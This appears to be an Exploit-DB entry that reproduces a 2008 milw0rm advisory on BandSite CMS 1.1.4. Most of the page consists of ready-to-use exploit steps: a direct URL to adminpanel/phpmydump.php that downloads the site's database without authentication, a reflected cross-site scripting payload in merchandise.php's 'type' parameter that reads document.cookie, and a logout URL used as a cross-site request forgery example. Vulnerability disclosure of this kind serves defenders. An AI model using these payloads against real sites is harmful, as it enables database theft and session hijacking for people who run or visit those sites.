BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF

vendor:

CMS

by:

SirGod

N/A

CVSS

N/A

Arbitrary Download Database/XSS/CSRF

N/A

CWE

Product Name: CMS

Affected Version From: 1.1.2004

Affected Version To: 1.1.2004

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF

Go to http://localhost/[Path]/adminpanel/phpmydump.php and the download will begin ( database.sql ). For XSS, http://localhost/[Path]/merchandise.php?type=[XSS] or http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>. For CSRF, if a logged in user with administrator privilegies click the following url he will be logged out http://localhost/[Path]/adminpanel/logout.php.

Mitigation:

N/A

Source

Exploit-DB raw data:

###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################

[+] Arbitrary Download Database

Go to

   http://localhost/[Path]/adminpanel/phpmydump.php

and the download will begin ( database.sql ) .


[+] Cross Site Scripting

    http://localhost/[Path]/merchandise.php?type=[XSS]
    http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>


[+] Cross Site Request Forgery

 If a logged in user with administrator privilegies click the following url he will be logged out.

    http://localhost/[Path]/adminpanel/logout.php


###########################################################################

# milw0rm.com [2008-08-21]